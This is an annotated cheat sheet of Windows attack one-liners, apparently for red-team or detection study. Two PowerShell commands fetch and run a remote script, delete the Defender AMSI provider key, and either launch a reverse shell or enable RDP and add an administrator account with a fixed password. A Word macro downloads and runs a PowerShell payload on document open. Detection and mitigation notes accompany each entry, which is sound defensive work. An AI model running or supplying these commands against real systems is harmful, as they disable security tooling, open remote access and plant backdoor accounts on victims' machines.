Disable AMSI and gain reverse shell
# What this one-liner does, as far as the page shows:
#   1. Fetches helper.ps1 over plain HTTP with Net.WebClient and runs the text
#      through iex, so the script executes from memory rather than from a file.
#   2. Calls `helper -custom` with a command string. What `helper` does with the
#      string is not shown here; presumably it runs it elevated, since the
#      HKLM writes below need administrative rights. Verify against helper.ps1.
#   3. The command string creates the ...C57AFF key under AMSI\Providers, then
#      recursively deletes the ...C57AFE key. The two GUIDs differ only in the
#      last character. ...C57AFE is the GUID commonly registered by the
#      Microsoft Defender AMSI provider (confirm on the host); removing it is
#      what the heading calls "disable AMSI".
#   4. Runs the operator-supplied reverse-shell command (placeholder on the page).
#
# Detection notes:
#   - PowerShell script block logging (event 4104) records the iex/DownloadString
#     cradle and the registry cmdlets; proxy or network logs show the plain-HTTP
#     fetch of helper.ps1.
#   - Registry key create/delete under HKLM\SOFTWARE\Microsoft\AMSI\Providers
#     (e.g. Sysmon event 12) is rare in normal operation and worth alerting on.
#   - Process-creation logging with command lines (Security 4688 / Sysmon 1)
#     shows the cmd.exe -> powershell chain.
# Mitigation notes: monitor and restore the provider registration, and restrict
# who can run PowerShell with administrative rights (application control,
# Constrained Language Mode).
iex (New-Object Net.WebClient).DownloadString('http://<ip address>/helper.ps1');helper -custom "cmd.exe /c powershell New-Item 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFF}' -Force; Remove-Item -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}' -Recurse; cmd.exe /c <powershell reverse shell>"
Disable AMSI, enable RDP, and create admin user
# What this one-liner does, as far as the page shows:
#   1. Fetches helper.ps1 over plain HTTP and runs it with iex, then calls
#      `helper -custom` with the command string below. The behaviour of `helper`
#      is not shown here; the HKLM, firewall and account changes all need
#      administrative rights, so it presumably runs the string elevated.
#   2. Creates the ...C57AFF key and recursively deletes the ...C57AFE key under
#      HKLM:\SOFTWARE\Microsoft\AMSI\Providers (the "disable AMSI" step).
#   3. Sets fDenyTSConnections to 0 under the Terminal Server key and enables the
#      'Remote Desktop' firewall rule group, which turns on inbound RDP.
#   4. Creates local user test123 with a fixed password and adds it to the local
#      administrators group.
#
# Detection notes:
#   - Security event 4720 (user account created) followed by 4732 (member added
#     to a security-enabled local group) for the Administrators group.
#   - A registry value set on ...\Control\Terminal Server\fDenyTSConnections
#     (e.g. Sysmon event 13) and a change to the Remote Desktop firewall rules.
#   - The account name and password are static on this page and are passed on
#     the command line, so they appear in process-creation logs (4688 / Sysmon 1)
#     and in script block logging (4104); both strings are usable as hunting
#     indicators.
#   - Registry key create/delete under AMSI\Providers, as in the previous entry.
# Mitigation notes: alert on new local administrators, keep RDP closed at the
# network edge, and require Network Level Authentication where RDP is needed.
iex (New-Object Net.WebClient).DownloadString('http://<ip address>/helper.ps1');helper -custom "cmd.exe /c powershell New-Item 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFF}' -Force; Remove-Item -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}' -Recurse; reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fDenyTSConnections /t REG_DWORD /d 0 /f; Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'; cmd.exe /c net user test123 Password123! /add; net localgroup administrators test123 /add"
Word macro: download and run a PowerShell script when the document opens
' DoStuff: creates a WScript.Shell COM object and uses its Run method to start
' powershell. The PowerShell command downloads banana.txt over plain HTTP from
' the host "webserver" with Net.WebClient and passes the text to iex, so the
' downloaded content runs as PowerShell without being saved as a script file.
'
' Detection notes:
'   - The Office process (WINWORD.EXE) becomes the parent of powershell.exe;
'     process-creation logs with parent image and command line show this.
'   - PowerShell script block logging (event 4104) records the DownloadString
'     cradle and whatever banana.txt contains.
' Mitigation notes: block macros in files that come from the internet, and
' enable the attack surface reduction rule "Block all Office applications from
' creating child processes".
Sub DoStuff()
Dim wsh As Object
' Late-bound COM object; no project reference is needed in the document.
Set wsh = CreateObject("WScript.Shell")
' Run is called with the command string only; no window style or wait argument is passed.
wsh.Run "powershell iex (New-Object Net.WebClient).DownloadString('http://webserver/banana.txt')"
' Release the COM reference.
Set wsh = Nothing
End Sub
' AutoOpen: Word runs a macro with this name automatically when the document is
' opened, provided macros are allowed to run. Here it only calls DoStuff, so
' opening the document is the trigger for the download-and-execute step.
' Triage note: an AutoOpen (or Document_Open) entry point in a document's macro
' project is a standard thing to check when examining a suspicious file.
Sub AutoOpen()
DoStuff
End Sub